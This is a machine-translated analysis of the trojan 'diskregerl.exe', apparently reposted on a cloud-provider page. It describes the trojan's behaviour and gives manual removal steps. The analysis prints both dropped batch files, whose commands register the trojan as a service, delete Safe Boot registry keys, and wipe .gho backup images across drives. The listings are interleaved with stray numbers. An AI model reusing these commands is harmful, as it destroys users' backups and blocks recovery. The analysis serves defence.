Diskregerl.exe (TROJAN.AGENT.CDT) Virus manual killing _ virus killing

Source: Internet
Author: User
File md5:e98a4571cf72b798077d12d6c4894629
Behavioral Analysis:
1. Copy files:
C:\windows\system32\diskregerl.exe 45,056 bytes
2, no Add Startup item action.
3. Release 2 Batches:
The content is:
22483
17213
25187
6133
22690
25373
Date 2004-08-17
19477
Time 20:00:00
Ping 127.0.0.1-n 5
Sc.exe Create Diskregerl binpath= "C:\windows\system32\diskregerl.exe-kills" type= own type= interact start= Auto Display Name= Diskregerl Programnot
Sc.exe Description Diskregerl Create a network connection 2
regsvr32.exe/u/S Scrrun.dll
regsvr32.exe/u/S Shimgvw.dll
regsvr32.exe/u/S Itss.dll
regsvr32.exe/u/S Vbscript.dll
REGSVR32.EXE/S Jscript.dll
reg.exe Delete hklm\system\controlset001\control\safeboot\minimal\{4d36e967-e325-11ce-bfc1-08002be10318}/F
reg.exe Delete hklm\system\controlset001\control\safeboot\network\{4d36e967-e325-11ce-bfc1-08002be10318}/F
reg.exe Delete hklm\system\currentcontrolset\control\safeboot\minimal\{4d36e967-e325-11ce-bfc1-08002be10318}/F
reg.exe Delete hklm\system\currentcontrolset\control\safeboot\network\{4d36e967-e325-11ce-bfc1-08002be10318}/F
Reg.exe Delete hklm\software\microsoft\windows\currentversion\run/f
23413
Sc.exe start Diskregerl
Del "C:\WINDOWS\Media\Windows XP started. wav"
Del "C:\WINDOWS\Media\Windows XP Information Bar. wav"
Del "C:\WINDOWS\Media\Windows XP pop-up window blocked. wav"
REGSVR32.EXE/S C:\windows\system32\Programnot.dll
Ping 127.0.0.1-n 6
Del "C:\Documents and Settings\ lonely more reliable \ Desktop \oky.exe"/F
22483
17213
Date 2008-04-02
Time 08:21:33
Del%0
Exit
The second one:
25187
6133
226902537319477
2819720092
404
Ping 127.0.0.1-n 16
13539
CMD.EXE/C del/f/s/q C:*.gho
6752
CMD.EXE/C del/f/s/q D:*.gho
31772
CMD.EXE/C del/f/s/q E:*.gho
12028
CMD.EXE/C del/f/s/q F:*.gho
8720
CMD.EXE/C del/f/s/q G:*.gho
10731
CMD.EXE/C del/f/s/q H:*.gho
8840
CMD.EXE/C del/f/s/q I:*.gho
11736
REGSVR32.EXE/S C:\windows\system32\Programnot.dll
Del%0
Exit
4, connect the website, brush flow:
http://www.xerty.cn/^^/300center.htm
5, in addition, the virus may maliciously lock IE homepage, but not implemented.
Workaround:
1, restart the computer.
2, delete the file:
C:\windows\system32\diskregerl.exe
3, if the virus can not be deleted after reboot, please download the ice blade (the software can be downloaded to down.45it.com), to end its process.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.